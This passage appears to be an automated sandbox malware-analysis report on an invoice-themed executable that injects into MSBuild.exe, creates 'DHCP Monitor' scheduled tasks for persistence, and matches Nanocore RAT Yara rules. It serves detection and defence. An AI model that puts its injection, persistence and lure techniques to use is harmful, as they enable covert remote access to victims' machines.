Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6768	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe TID: 6888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Window / User API: foregroundWindowGot 897

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Code function: 2_2_052E11C2 GetSystemInfo,

2_2_052E11C2

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A398C4 IsDebuggerPresent,

0_2_00A398C4

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A36BA5 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00A36BA5

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A310B0 ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,GetLastError,GetProcessHeap,HeapFree,

0_2_00A310B0

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A348D3 SetUnhandledExceptionFilter,		0_2_00A348D3
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: 0_2_00A34904 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00A34904

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp8052.tmp'	Jump to behavior

Source: MSBuild.exe, 00000002.00000002.484445758.00000000032D9000.00000004.00000001.sdmp	Binary or memory string: Program Manager(
Source: MSBuild.exe, 00000002.00000002.484415620.00000000032C5000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000002.00000002.481714159.0000000001750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: MSBuild.exe, 00000002.00000002.481714159.0000000001750000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MSBuild.exe, 00000002.00000002.481714159.0000000001750000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	0_2_00A3FCB8
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00A390CA
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00A3BC67
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,	0_2_00A35DAE
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00A3FDE2
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_00A3F9C3
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: EnumSystemLocalesW,	0_2_00A3F967
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	0_2_00A3FE8F
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: EnumSystemLocalesW,	0_2_00A3928D
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	0_2_00A3F6F3
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	0_2_00A3FAC3
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00A38239
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_00A3FA40
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00A377BF
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	0_2_00A37BFF
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: GetLocaleInfoW,	0_2_00A39313
Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	0_2_00A3FF63

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A39BEE cpuid

0_2_00A39BEE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\P0 (2021)-2790 new order.exe

Code function: 0_2_00A33ECC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00A33ECC

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: P0 (2021)-2790 new order.exe, 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000002.00000002.482557844.0000000003071000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40d7a70.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.P0 (2021)-2790 new order.exe.2720000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.40dc099.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.MSBuild.exe.5cc4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: P0 (2021)-2790 new order.exe PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6440, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E292E bind,		2_2_052E292E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Code function: 2_2_052E28FB bind,		2_2_052E28FB

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
